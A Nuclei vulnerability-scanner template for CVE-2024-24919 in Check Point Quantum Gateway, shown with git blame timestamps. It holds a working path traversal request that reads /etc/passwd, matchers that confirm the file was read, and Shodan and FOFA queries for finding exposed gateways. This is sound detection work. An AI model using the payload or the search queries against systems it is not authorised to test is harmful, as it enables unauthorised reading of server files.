nuclei-templates/http/cves/2024/CVE-2024-24919.yaml

46 lines
1.4 KiB
YAML
Raw Normal View History

2024-05-30 03:36:42 +00:00
id: CVE-2024-24919
info:
2024-05-30 11:17:43 +00:00
name: Check Point Quantum Gateway - Information Disclosure
2024-05-30 03:36:42 +00:00
author: johnk3r
2024-05-30 03:48:57 +00:00
severity: high
description: |
CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade.
2024-05-30 03:48:57 +00:00
reference:
- https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
2024-05-30 04:33:41 +00:00
- https://support.checkpoint.com/results/sk/sk182337
2024-05-30 03:36:42 +00:00
metadata:
2024-06-04 07:03:25 +00:00
verified: true
2024-05-30 03:36:42 +00:00
max-request: 1
vendor: checkpoint
2024-05-30 09:39:10 +00:00
product: quantum_security_gateway
2024-06-04 07:03:25 +00:00
shodan-query:
- html:"Check Point SSL Network"
- http.html:"check point ssl network"
fofa-query: body="check point ssl network"
2024-05-31 19:23:20 +00:00
cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:*
2024-05-30 09:39:10 +00:00
tags: cve,cve2024,checkpoint,lfi
2024-05-30 03:36:42 +00:00
http:
2024-05-30 04:52:03 +00:00
- raw:
- |
POST /clients/MyCRL HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip
2024-05-30 03:36:42 +00:00
2024-06-12 05:39:52 +00:00
aCSHELL/../../../../../../../etc/passwd
2024-06-04 07:03:25 +00:00
2024-05-30 03:36:42 +00:00
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*"
- "nobody:.*"
2024-05-30 08:52:10 +00:00
condition: and
2024-05-30 03:36:42 +00:00
- type: status
status:
2024-05-30 11:17:43 +00:00
- 200
2024-06-12 05:39:52 +00:00
# digest: 4a0a00473045022100db238be0007f00eb1a68d0dfe786fb13645c8b56b32666b8b6880212d8c3120b02200984f27411b639a4fe0b0f4436518d1cc33acd711082946f88d8afdec0ce0dfd:922c64590222798bb761d5b6d8e72950